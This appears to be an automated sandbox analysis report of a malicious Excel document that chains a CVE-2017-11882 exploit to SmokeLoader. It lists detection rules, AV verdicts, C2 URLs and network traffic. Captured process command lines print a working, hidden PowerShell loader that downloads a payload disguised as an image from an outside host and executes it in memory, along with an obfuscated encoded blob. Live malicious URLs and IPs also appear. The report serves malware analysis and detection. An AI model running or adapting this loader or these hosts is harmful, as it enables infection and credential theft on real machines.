            Source: Registry Key setAuthor: frack113: Data: Details: 46 00 00 00 2A 00 00 00 09 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 00 02 00 00 00 C0 A8 02 16 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 , EventID: 13, EventType: SetValue, Image: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE, ProcessId: 1440, TargetObject: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections\SavedLegacySettings
            Source: Process startedAuthor: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command "$codigo = 'ZgB1DgTreG4DgTreYwB0DgTreGkDgTrebwBuDgTreCDgTreDgTreRDgTreBvDgTreHcDgTrebgBsDgTreG8DgTreYQBkDgTreEQDgTreYQB0DgTreGEDgTreRgByDgTreG8DgTrebQBMDgTreGkDgTrebgBrDgTreHMDgTreIDgTreB7DgTreCDgTreDgTrecDgTreBhDgTreHIDgTreYQBtDgTreCDgTreDgTreKDgTreBbDgTreHMDgTredDgTreByDgTreGkDgTrebgBnDgTreFsDgTreXQBdDgTreCQDgTrebDgTreBpDgTreG4DgTreawBzDgTreCkDgTreIDgTreDgTrekDgTreHcDgTreZQBiDgTreEMDgTrebDgTreBpDgTreGUDgTrebgB0DgTreCDgTreDgTrePQDgTregDgTreE4DgTreZQB3DgTreC0DgTreTwBiDgTreGoDgTreZQBjDgTreHQDgTreIDgTreBTDgTreHkDgTrecwB0DgTreGUDgTrebQDgTreuDgTreE4DgTreZQB0DgTreC4DgTreVwBlDgTreGIDgTreQwBsDgTreGkDgTreZQBuDgTreHQDgTreOwDgTregDgTreCQDgTreZDgTreBvDgTreHcDgTrebgBsDgTreG8DgTreYQBkDgTreGUDgTreZDgTreBEDgTreGEDgTredDgTreBhDgTreCDgTreDgTrePQDgTregDgTreEDgTreDgTreKDgTreDgTrepDgTreDsDgTreIDgTreDgTrekDgTreHMDgTreaDgTreB1DgTreGYDgTreZgBsDgTreGUDgTreZDgTreBMDgTreGkDgTrebgBrDgTreHMDgTreIDgTreDgTre9DgTreCDgTreDgTreJDgTreBsDgTreGkDgTrebgBrDgTreHMDgTreIDgTreB8DgTreCDgTreDgTreRwBlDgTreHQDgTreLQBSDgTreGEDgTrebgBkDgTreG8DgTrebQDgTregDgTreC0DgTreQwBvDgTreHUDgTrebgB0DgTreCDgTreDgTreJDgTreBsDgTreGkDgTrebgBrDgTreHMDgTreLgBMDgTreGUDgTrebgBnDgTreHQDgTreaDgTreDgTre7DgTreCDgTreDgTreZgBvDgTreHIDgTreZQBhDgTreGMDgTreaDgTreDgTregDgTreCgDgTreJDgTreBsDgTreGkDgTrebgBrDgTreCDgTreDgTreaQBuDgTreCDgTreDgTreJDgTreBzDgTreGgDgTredQBmDgTreGYDgTrebDgTreBlDgTreGQDgTreTDgTreBpDgTreG4DgTreawBzDgTreCkDgTreIDgTreB7DgTreCDgTreDgTredDgTreByDgTreHkDgTreIDgTreB7DgTreCDgTreDgTreJDgTreBkDgTreG8DgTredwBuDgTreGwDgTrebwBhDgTreGQDgTreZQBkDgTreEQDgTreYQB0DgTreGEDgTreIDgTreDgTrerDgTreD0DgTreIDgTreDgTrekDgTreHcDgTreZQBiDgTreEMDgTrebDgTreBpDgTreGUDgTrebgB0DgTreC4DgTreRDgTreBvDgTreHcDgTrebgBsDgTreG8DgTreYQBkDgTreEQDgTreYQB0DgTreGEDgTreKDgTreDgTrekDgTreGwDgTreaQBuDgTreGsDgTreKQDgTregDgTreH0DgTreIDgTreBjDgTreGEDgTredDgTreBjDgTreGgDgTreIDgTreB7DgTreCDgTreDgTreYwBvDgTreG4DgTredDgTreBpDgTreG4DgTredQBlDgTreCDgTreDgTrefQDgTregDgTreH0DgTreOwDgTregDgTreHIDgTreZQB0DgTreHUDgTrecgBuDgTreCDgTreDgTreJDgTreBkDgTreG8DgTredwBuDgTreGwDgTrebwBhDgTreGQDgTreZQBkDgTreEQDgTreYQB0DgTreGEDgTreIDgTreB9DgTreDsDgTreIDgTreDgTrekDgTreGwDgTreaQBuDgTreGsDgTrecwDgTregDgTreD0DgTreIDgTreBDgTreDgTreCgDgTreJwBoDgTreHQDgTredDgTreBwDgTreHMDgTreOgDgTrevDgTreC8DgTredQBwDgTreGwDgTrebwBhDgTreGQDgTreZDgTreBlDgTreGkDgTrebQBhDgTreGcDgTreZQBuDgTreHMDgTreLgBjDgTreG8DgTrebQDgTreuDgTreGIDgTrecgDgTrevDgTreGkDgTrebQBhDgTreGcDgTreZQBzDgTreC8DgTreMDgTreDgTrewDgTreDQDgTreLwDgTre3DgTreDgDgTreNQDgTrevDgTreDcDgTreMgDgTrewDgTreC8DgTrebwByDgTreGkDgTreZwBpDgTreG4DgTreYQBsDgTreC8DgTrebgBlDgTreHcDgTreXwBpDgTreG0DgTreYQBnDgTreGUDgTreLgBqDgTreHDgTreDgTreZwDgTre/DgTreDEDgTreNwDgTrexDgTreDYDgTreMwDgTrewDgTreDcDgTreNgDgTrezDgTreDQDgTreJwDgTresDgTreCDgTreDgTreJwBoDgTreHQDgTredDgTreBwDgTreHMDgTreOgDgTrevDgTreC8DgTredQBwDgTreGwDgTrebwBhDgTreGQDgTreZDgTreBlDgTreGkDgTrebQBhDgTreGcDgTreZQBuDgTreHMDgTreLgBjDgTreG8DgTrebQDgTreuDgTreGIDgTrecgDgTrevDgTreGkDgTrebQBhDgTreGcDgTreZQBzDgTreC8DgTreMDgTreDgTrewDgTr
            Source: File createdAuthor: Nasreddine Bencherchali (Nextron Systems): Data: EventID: 11, Image: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE, ProcessId: 2504, TargetFilename: C:\Users\user\AppData\Roaming\Microsoft\Templates\~$Normal.dotm
            Source: File createdAuthor: frack113: Data: EventID: 11, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ProcessId: 3308, TargetFilename: C:\Users\user\AppData\Local\Temp\qayv3mea.xvo.ps1

            Data Obfuscation

            barindex
            Source: Process startedAuthor: Joe Security: Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -Noprofile -command "function DownloadDataFromLinks { param ([string[]]$links) $webClient = New-Object System.Net.WebClient; $downloadedData = @(); $shuffledLinks = $links | Get-Random -Count $links.Length; foreach ($link in $shuffledLinks) { try { $downloadedData += $webClient.DownloadData($link) } catch { continue } }; return $downloadedData }; $links = @('https://uploaddeimagens.com.br/images/004/785/720/original/new_image.jpg?1716307634', 'https://uploaddeimagens.com.br/images/004/785/720/original/new_image.jpg?1716307634'); $imageBytes = DownloadDataFromLinks $links; if ($imageBytes -ne $null) { $imageText = [System.Text.Encoding]::UTF8.GetString($imageBytes); $startFlag = '<<BASE64_START>>'; $endFlag = '<<BASE64_END>>'; $startIndex = $imageText.IndexOf($startFlag); $endIndex = $imageText.IndexOf($endFlag); if ($startIndex -ge 0 -and $endIndex -gt $startIndex) { $startIndex += $startFlag.Length; $base64Length = $endIndex - $startIndex; $base64Command = $imageText.Substring($startIndex, $base64Length); $commandBytes = [System.Convert]::FromBase64String($base64Command); $loadedAssembly = [System.Reflection.Assembly]::Load($commandBytes); $type = $loadedAssembly.GetType('PROJETOAUTOMACAO.VB.Home'); $method = $type.GetMethod('VAI').Invoke($null, [object[]] ('txt.GBR/0808/651.771.64.891//:ptth' , 'desativado' , 'desativado' , 'desativado','RegAsm',''))} }", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -Noprofile -command "function DownloadDataFromLinks { param ([string[]]$links) $webClient = New-Object System.Net.WebClient; $downloadedData = @(); $shuffledLinks = $links | Get-Random -Count $links.Length; foreach ($link in $shuffledLinks) { try { $downloadedData += $webClient.DownloadData($link) } catch { continue } }; return $downloadedData }; $links = @('https://uploaddeimagens.com.br/images/004/785/720/original/new_image.jpg?1716307634', 'https://uploaddeimagens.com.br/images/004/785/720/original/new_image.jpg?1716307634'); $imageBytes = DownloadDataFromLinks $links; if ($imageBytes -ne $null) { $imageText = [System.Text.Encoding]::UTF8.GetString($imageBytes); $startFlag = '<<BASE64_START>>'; $endFlag = '<<BASE64_END>>'; $startIndex = $imageText.IndexOf($startFlag); $endIndex = $imageText.IndexOf($endFlag); if ($startIndex -ge 0 -and $endIndex -gt $startIndex) { $startIndex += $startFlag.Length; $base64Length = $endIndex - $startIndex; $base64Command = $imageText.Substring($startIndex, $base64Length); $commandBytes = [System.Convert]::FromBase64String($base64Command); $loadedAssembly = [System.Reflection.Assembly]::Load($commandBytes); $type = $loadedAssembly.GetType('PROJETOAUTOMACAO.VB.Home'); $method = $type.GetMethod('VAI').Invoke($null, [object[]] ('txt.GBR/0808/651.771.64.891//:ptth' , 'desativado' , 'desativado' , 'desativado','RegAsm',''))} }", Comm
            Timestamp:05/28/24-09:30:54.680711
            SID:2039103
            Source Port:49178
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected

            Click to jump to signature section

            Show All Signature Results

            AV Detection

            barindex
            Source: http://vilendar.ga/index.phpAvira URL Cloud: Label: malware
            Source: https://uploaddeimagens.com.br/images/004/785/720/original/new_image.jpg?1716307634Avira URL Cloud: Label: malware
            Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRF{E5BBB120-EEF3-40B5-B932-2B0745709A9C}.tmpAvira: detection malicious, Label: EXP/CVE-2017-11882.Gen
            Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\6619CBCE.docAvira: detection malicious, Label: HEUR/Rtf.Malformed
            Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\T4O403JZ\lionsarebeautifultoruletheforestandtheyalwayskingogthejunglewhoneverknowmanythingkingisrigerbutlionisthekingo__junglelionbeautiufl[1].docAvira: detection malicious, Label: HEUR/Rtf.Malformed
            Source: 0000000D.00000002.473315966.00000000000A0000.00000004.00001000.00020000.00000000.sdmpMalware Configuration Extractor: SmokeLoader {"Version": 2022, "C2 list": ["http://prolinice.ga/index.php", "http://vilendar.ga/index.php"]}
            Source: z2.inkVirustotal: Detection: 7%Perma Link
            Source: uploaddeimagens.com.brVirustotal: Detection: 5%Perma Link
            Source: http://198.46.177.156/8080/RBG.txtVirustotal: Detection: 8%Perma Link
            Source: http://z2.ink/Virustotal: Detection: 7%Perma Link
            Source: http://prolinice.ga/index.phpVirustotal: Detection: 11%Perma Link
            Source: http://vilendar.ga/index.phpVirustotal: Detection: 7%Perma Link
            Source: http://z2.ink/zBODVirustotal: Detection: 6%Perma Link
            Source: https://uploaddeimagens.com.br/images/004/785/720/original/new_image.jpg?1716307634Virustotal: Detection: 12%Perma Link
            Source: http://198.46.177.156/xampp/msdc/ms/lionsarebeautifultoruletheforestandtheyalwayskingogthejunglewhoneverknowmanythingkingisrigerbutlionisthekingo__junglelionbeautiufl.docVirustotal: Detection: 8%Perma Link
            Source: http://z2.ink/zBODyXVirustotal: Detection: 6%Perma Link
            Source: https://uploaddeimagens.com.brVirustotal: Detection: 6%Perma Link
            Source: http://198.46.177.156/9090/lionsarekingofjungleimageshere.bmpVirustotal: Detection: 8%Perma Link
            Source: #20240627_Edlen_B.xlsReversingLabs: Detection: 15%
            Source: #20240627_Edlen_B.xlsVirustotal: Detection: 7%Perma Link
            Source: C:\Windows\explorer.exeCode function: 14_2_026E5174 CryptAcquireContextA,14_2_026E5174
            Source: C:\Windows\SysWOW64\explorer.exeCode function: 18_2_00083098 GetTempPathW,GetTempFileNameW,DeleteFileW,CopyFileW,RtlCompareMemory,RtlZeroMemory,CryptUnprotectData,DeleteFileW,18_2_00083098
            Source: C:\Windows\SysWOW64\explorer.exeCode function: 18_2_00083717 GetTempPathW,GetTempFileNameW,DeleteFileW,CopyFileW,RtlCompareMemory,RtlZeroMemory,lstrlen,lstrlen,wsprintfA,lstrlen,lstrcat,CryptUnprotectData,lstrlen,lstrlen,wsprintfA,lstrlen,lstrcat,lstrlen,DeleteFileW,18_2_00083717
            Source: C:\Windows\SysWOW64\explorer.exeCode function: 18_2_00083E04 RtlCompareMemory,CryptUnprotectData,18_2_00083E04
            Source: C:\Windows\SysWOW64\explorer.exeCode function: 18_2_00081198 CryptBinaryToStringA,CryptBinaryToStringA,18_2_00081198
            Source: C:\Windows\SysWOW64\explorer.exeCode function: 18_2_000811E1 lstrcmpiW,lstrlenW,CryptStringToBinaryW,CryptStringToBinaryW,CryptStringToBinaryW,18_2_000811E1
            Source: C:\Windows\SysWOW64\explorer.exeCode function: 18_2_0008123B lstrlen,CryptStringToBinaryA,CryptStringToBinaryA,18_2_0008123B
            Source: C:\Windows\SysWOW64\explorer.exeCode function: 18_2_00081FCE CryptUnprotectData,RtlMoveMemory,18_2_00081FCE
            Source: C:\Windows\SysWOW64\explorer.exeCode function: 20_2_000826AC lstrlen,CryptBinaryToStringA,CryptBinaryToStringA,20_2_000826AC
            Source: C:\Windows\SysWOW64\explorer.exeCode function: 22_2_0008178C lstrlen,CryptBinaryToStringA,CryptBinaryToStringA,22_2_0008178C
            Source: C:\Windows\SysWOW64\explorer.exeCode function: 22_2_0008118D CryptAcquireContextA,CryptCreateHash,lstrlen,CryptHashData,CryptGetHashParam,wsprintfA,CryptDestroyHash,CryptReleaseContext,22_2_0008118D
            Source: C:\Windows\SysWOW64\explorer.exeCode function: 24_2_00082404 lstrlen,CryptStringToBinaryA,CryptStringToBinaryA,CryptStringToBinaryA,24_2_00082404
            Source: C:\Windows\SysWOW64\explorer.exeCode function: 24_2_0008245E lstrlen,CryptBinaryToStringA,CryptBinaryToStringA,24_2_0008245E
            Source: C:\Windows\SysWOW64\explorer.exeCode function: 24_2_0008263E CryptAcquireContextA,CryptCreateHash,lstrlen,CryptHashData,CryptGetHashParam,wsprintfA,CryptDestroyHash,CryptReleaseContext,24_2_0008263E
            Source: C:\Windows\SysWOW64\explorer.exeCode function: 29_2_00082799 CryptAcquireContextA,CryptCreateHash,lstrlen,CryptHashData,CryptGetHashParam,wsprintfA,CryptDestroyHash,CryptReleaseContext,29_2_00082799
            Source: C:\Windows\SysWOW64\explorer.exeCode function: 29_2_000825A4 CryptBinaryToStringA,CryptBinaryToStringA,29_2_000825A4

            Exploits

            barindex
            Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXENetwork connect: IP: 198.46.177.156 Port: 80Jump to behavior
            Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess created: C:\Windows\SysWOW64\wscript.exeJump to behavior
            Source: ~WRF{E5BBB120-EEF3-40B5-B932-2B0745709A9C}.tmp.4.drStream path '_1778372160/\x1CompObj' : ...................F....Microsoft Equation 3.0....
            Source: ~WRF{E5BBB120-EEF3-40B5-B932-2B0745709A9C}.tmp.4.drStream path '_1778372164/\x1CompObj' : ...................F....Microsoft Equation 3.0....
            Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess created: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE "C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -Embedding
            Source: unknownHTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.22:49175 version: TLS 1.0
            Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dllJump to behavior
            Source: unknownHTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.22:49174 version: TLS 1.2
            Source: Binary string: F:\System.Management.Automation Controle Financeiro Rump fix\obj\Debug\net20\System.Management.Automation.pdb source: powershell.exe, 0000000C.00000002.494209525.0000000009260000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000C.00000002.461385343.0000000003D19000.00000004.00000800.00020000.00000000.sdmp
            Source: Binary string: RegAsm.pdb source: rugtucw, 00000010.00000000.513756817.0000000000E72000.00000020.00000001.01000000.00000009.sdmp, rugtucw.14.dr
            Source: Binary string: RegAsm.pdb4 source: rugtucw, 00000010.00000000.513756817.0000000000E72000.00000020.00000001.01000000.00000009.sdmp, rugtucw.14.dr
            Source: Binary string: F:\System.Management.Automation Controle Financeiro Rump fix\obj\Debug\net20\System.Management.Automation.pdbSHA256 source: powershell.exe, 0000000C.00000002.494209525.0000000009260000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000C.00000002.461385343.0000000003D19000.00000004.00000800.00020000.00000000.sdmp
            Source: C:\Windows\SysWOW64\explorer.exeCode function: 18_2_00081D4A FindFirstFileW,lstrcmpiW,lstrcmpiW,lstrcmpiW,FindNextFileW,FindClose,18_2_00081D4A
            Source: C:\Windows\SysWOW64\explorer.exeCode function: 18_2_00083ED9 PathCombineW,FindFirstFileW,lstrcmpiW,lstrcmpiW,PathCombineW,lstrcmpiW,PathCombineW,FindNextFileW,FindClose,18_2_00083ED9
            Source: C:\Windows\SysWOW64\explorer.exeCode function: 18_2_00082B15 FindFirstFileW,lstrcmpiW,lstrcmpiW,StrStrIW,StrStrIW,FindNextFileW,FindClose,18_2_00082B15
            Source: C:\Windows\SysWOW64\explorer.exeCode function: 20_2_0008255C lstrcatW,PathAppendW,FindFirstFileW,RtlZeroMemory,lstrcatW,PathAppendW,lstrcatW,PathAppendW,StrStrIW,FindNextFileW,FindClose,20_2_0008255C
            Source: C:\Windows\SysWOW64\explorer.exeCode function: 22_2_000815BE RtlZeroMemory,SHGetSpecialFolderPathW,lstrcatW,PathCombineW,FindFirstFileW,lstrcmpiW,lstrcmpiW,lstrcmpiW,PathCombineW,PathMatchSpecW,PathCombineW,FindNextFileW,FindClose,22_2_000815BE
            Source: C:\Windows\SysWOW64\explorer.exeCode function: 22_2_000814D8 wsprintfW,FindFirstFileW,wsprintfW,SetFileAttributesW,DeleteFileW,FindNextFileW,FindClose,22_2_000814D8
            Source: C:\Windows\SysWOW64\explorer.exeCode function: 22_2_000813FE wsprintfW,FindFirstFileW,wsprintfW,RemoveDirectoryW,FindNextFileW,FindClose,22_2_000813FE
            Source: C:\Windows\explorer.exeCode function: 23_2_00061EB4 FindFirstFileW,23_2_00061EB4
            Source: C:\Windows\explorer.exeCode function: 23_2_00061DB0 FindFirstFileW,23_2_00061DB0
            Source: C:\Windows\SysWOW64\explorer.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\Jump to behavior
            Source: C:\Windows\SysWOW64\explorer.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\html\Jump to behavior
            Source: C:\Windows\SysWOW64\explorer.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\bg\Jump to behavior
            Source: C:\Windows\SysWOW64\explorer.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\Jump to behavior
            Source: C:\Windows\SysWOW64\explorer.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\css\Jump to behavior
            Source: C:\Windows\SysWOW64\explorer.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\images\Jump to behavior

            Software Vulnerabilities

            barindex
            Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess created: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
            Source: C:\Windows\SysWOW64\wscript.exeChild: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeChild: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
            Source: global trafficDNS query: name: z2.ink
            Source: global trafficDNS query: name: z2.ink
            Source: global trafficDNS query: name: z2.ink
            Source: global trafficDNS query: name: z2.ink
            Source: global trafficDNS query: name: z2.ink
            Source: global trafficDNS query: name: z2.ink
            Source: global trafficDNS query: name: paste.ee
            Source: global trafficDNS query: name: uploaddeimagens.com.br
            Source: global trafficDNS query: name: prolinice.ga
            Source: global trafficDNS query: name: prolinice.ga
            Source: global trafficDNS query: name: prolinice.ga
            Source: global trafficDNS query: name: prolinice.ga
            Source: global trafficTCP traffic: 192.168.2.22:49174 -> 188.114.97.3:443
            Source: global trafficTCP traffic: 192.168.2.22:49175 -> 188.114.97.3:443
            Source: global trafficTCP traffic: 192.168.2.22:49176 -> 188.114.97.3:443
            Source: global trafficTCP traffic: 192.168.2.22:49163 -> 54.241.153.192:80
            Source: global trafficTCP traffic: 192.168.2.22:49164 -> 198.46.177.156:80
            Source: global trafficTCP traffic: 192.168.2.22:49173 -> 198.46.177.156:80
            Source: global trafficTCP traffic: 192.168.2.22:49177 -> 198.46.177.156:80
            Source: global trafficTCP traffic: 192.168.2.22:49174 -> 188.114.97.3:443
            Source: global trafficTCP traffic: 192.168.2.22:49174 -> 188.114.97.3:443
            Source: global trafficTCP traffic: 192.168.2.22:49174 -> 188.114.97.3:443
            Source: global trafficTCP traffic: 192.168.2.22:49174 -> 188.114.97.3:443
            Source: global trafficTCP traffic: 192.168.2.22:49174 -> 188.114.97.3:443
            Source: global trafficTCP traffic: 192.168.2.22:49174 -> 188.114.97.3:443
            Source: global trafficTCP traffic: 192.168.2.22:49174 -> 188.114.97.3:443
            Source: global trafficTCP traffic: 192.168.2.22:49174 -> 188.114.97.3:443
            Source: global trafficTCP traffic: 192.168.2.22:49174 -> 188.114.97.3:443
            Source: global trafficTCP traffic: 192.168.2.22:49174 -> 188.114.97.3:443
            Source: global trafficTCP traffic: 192.168.2.22:49174 -> 188.114.97.3:443
            Source: global trafficTCP traffic: 192.168.2.22:49174 -> 188.114.97.3:443
            Source: global trafficTCP traffic: 192.168.2.22:49174 -> 188.114.97.3:443
            Source: global trafficTCP traffic: 192.168.2.22:49174 -> 188.114.97.3:443
            Source: global trafficTCP traffic: 192.168.2.22:49174 -> 188.114.97.3:443
            Source: global trafficTCP traffic: 192.168.2.22:49174 -> 188.114.97.3:443
            Source: global trafficTCP traffic: 192.168.2.22:49174 -> 188.114.97.3:443
            Source: global trafficTCP traffic: 192.168.2.22:49174 -> 188.114.97.3:443
            Source: global trafficTCP traffic: 192.168.2.22:49174 -> 188.114.97.3:443
            Source: global trafficTCP traffic: 192.168.2.22:49174 -> 188.114.97.3:443
            Source: global trafficTCP traffic: 192.168.2.22:49174 -> 188.114.97.3:443
            Source: global trafficTCP traffic: 192.168.2.22:49174 -> 188.114.97.3:443
            Source: global trafficTCP traffic: 192.168.2.22:49174 -> 188.114.97.3:443
            Source: global trafficTCP traffic: 192.168.2.22:49175 -> 188.114.97.3:443
            Source: global trafficTCP traffic: 192.168.2.22:49175 -> 188.114.97.3:443
            Source: global trafficTCP traffic: 192.168.2.22:49175 -> 188.114.97.3:443
            Source: global trafficTCP traffic: 192.168.2.22:49175 -> 188.114.97.3:443
            Source: global trafficTCP traffic: 192.168.2.22:49175 -> 188.114.97.3:443
            Source: global trafficTCP traffic: 192.168.2.22:49175 -> 188.114.97.3:443
            Source: global trafficTCP traffic: 192.168.2.22:49175 -> 188.114.97.3:443
            Source: global trafficTCP traffic: 192.168.2.22:49175 -> 188.114.97.3:443
            Source: global trafficTCP traffic: 192.168.2.22:49175 -> 188.114.97.3:443
            Source: global trafficTCP traffic: 192.168.2.22:49175 -> 188.114.97.3:443
            Source: global trafficTCP traffic: 192.168.2.22:49175 -> 188.114.97.3:443
            Source: global trafficTCP traffic: 192.168.2.22:49175 -> 188.114.97.3:443
            Source: global trafficTCP traffic: 192.168.2.22:49175 -> 188.114.97.3:443
            Source: global trafficTCP traffic: 192.168.2.22:49175 -> 188.114.97.3:443
            Source: global trafficTCP traffic: 192.168.2.22:49175 -> 188.114.97.3:443
            Source: global trafficTCP traffic: 192.168.2.22:49175 -> 188.114.97.3:443
            Source: global trafficTCP traffic: 192.168.2.22:49175 -> 188.114.97.3:443
            Source: global trafficTCP traffic: 192.168.2.22:49175 -> 188.114.97.3:443
            Source: global trafficTCP traffic: 192.168.2.22:49175 -> 188.114.97.3:443
            Source: global trafficTCP traffic: 192.168.2.22:49175 -> 188.114.97.3:443
            Source: global trafficTCP traffic: 192.168.2.22:49175 -> 188.114.97.3:443
            Source: global trafficTCP traffic: 192.168.2.22:49175 -> 188.114.97.3:443
            Source: global trafficTCP traffic: 192.168.2.22:49175 -> 188.114.97.3:443
            Source: global trafficTCP traffic: 192.168.2.22:49175 -> 188.114.97.3:443
            Source: global trafficTCP traffic: 192.168.2.22:49175 -> 188.114.97.3:443
            Source: global trafficTCP traffic: 192.168.2.22:49175 -> 188.114.97.3:443
            Source: global trafficTCP traffic: 192.168.2.22:49175 -> 188.114.97.3:443
            Source: global trafficTCP traffic: 192.168.2.22:49175 -> 188.114.97.3:443
            Source: global trafficTCP traffic: 192.168.2.22:49175 -> 188.114.97.3:443
            Source: global trafficTCP traffic: 192.168.2.22:49175 -> 188.114.97.3:443
            Source: global trafficTCP traffic: 192.168.2.22:49175 -> 188.114.97.3:443
            Source: global trafficTCP traffic: 192.168.2.22:49175 -> 188.114.97.3:443
            Source: global trafficTCP traffic: 192.168.2.22:49175 -> 188.114.97.3:443
            Source: global trafficTCP traffic: 192.168.2.22:49175 -> 188.114.97.3:443
            Source: global trafficTCP traffic: 192.168.2.22:49175 -> 188.114.97.3:443
            Source: global trafficTCP traffic: 192.168.2.22:49175 -> 188.114.97.3:443
            Source: global trafficTCP traffic: 192.168.2.22:49175 -> 188.114.97.3:443
            Source: global trafficTCP traffic: 192.168.2.22:49175 -> 188.114.97.3:443
            Source: global trafficTCP traffic: 192.168.2.22:49175 -> 188.114.97.3:443
            Source: global trafficTCP traffic: 192.168.2.22:49175 -> 188.114.97.3:443
            Source: global trafficTCP traffic: 192.168.2.22:49175 -> 188.114.97.3:443
            Source: global trafficTCP traffic: 192.168.2.22:49175 -> 188.114.97.3:443
            Source: global trafficTCP traffic: 192.168.2.22:49175 -> 188.114.97.3:443
            Source: global trafficTCP traffic: 192.168.2.22:49175 -> 188.114.97.3:443
            Source: global trafficTCP traffic: 192.168.2.22:49175 -> 188.114.97.3:443
            Source: global trafficTCP traffic: 192.168.2.22:49175 -> 188.114.97.3:443
            Source: global trafficTCP traffic: 192.168.2.22:49175 -> 188.114.97.3:443
            Source: global trafficTCP traffic: 192.168.2.22:49175 -> 188.114.97.3:443
            Source: global trafficTCP traffic: 192.168.2.22:49175 -> 188.114.97.3:443
            Source: global trafficTCP traffic: 192.168.2.22:49175 -> 188.114.97.3:443
            Source: global trafficTCP traffic: 192.168.2.22:49175 -> 188.114.97.3:443
            Source: global trafficTCP traffic: 192.168.2.22:49175 -> 188.114.97.3:443
            Source: global trafficTCP traffic: 192.168.2.22:49175 -> 188.114.97.3:443
            Source: global trafficTCP traffic: 192.168.2.22:49175 -> 188.114.97.3:443
            Source: global trafficTCP traffic: 192.168.2.22:49175 -> 188.114.97.3:443
            Source: global trafficTCP traffic: 192.168.2.22:49175 -> 188.114.97.3:443
            Source: global trafficTCP traffic: 192.168.2.22:49175 -> 188.114.97.3:443
            Source: global trafficTCP traffic: 192.168.2.22:49175 -> 188.114.97.3:443
            Source: global trafficTCP traffic: 192.168.2.22:49175 -> 188.114.97.3:443
            Source: global trafficTCP traffic: 192.168.2.22:49175 -> 188.114.97.3:443
            Source: global trafficTCP traffic: 192.168.2.22:49175 -> 188.114.97.3:443
            Source: global trafficTCP traffic: 192.168.2.22:49175 -> 188.114.97.3:443
            Source: global trafficTCP traffic: 192.168.2.22:49175 -> 188.114.97.3:443
            Source: global trafficTCP traffic: 192.168.2.22:49175 -> 188.114.97.3:443
            Source: global trafficTCP traffic: 192.168.2.22:49175 -> 188.114.97.3:443
            Source: global trafficTCP traffic: 192.168.2.22:49175 -> 188.114.97.3:443
            Source: global trafficTCP traffic: 192.168.2.22:49175 -> 188.114.97.3:443
            Source: global trafficTCP traffic: 192.168.2.22:49175 -> 188.114.97.3:443
            Source: global trafficTCP traffic: 192.168.2.22:49175 -> 188.114.97.3:443
            Source: global trafficTCP traffic: 192.168.2.22:49175 -> 188.114.97.3:443
            Source: global trafficTCP traffic: 192.168.2.22:49175 -> 188.114.97.3:443
            Source: global trafficTCP traffic: 192.168.2.22:49175 -> 188.114.97.3:443
            Source: global trafficTCP traffic: 192.168.2.22:49175 -> 188.114.97.3:443
            Source: global trafficTCP traffic: 192.168.2.22:49175 -> 188.114.97.3:443
            Source: global trafficTCP traffic: 192.168.2.22:49175 -> 188.114.97.3:443
            Source: global trafficTCP traffic: 192.168.2.22:49175 -> 188.114.97.3:443
            Source: global trafficTCP traffic: 192.168.2.22:49175 -> 188.114.97.3:443
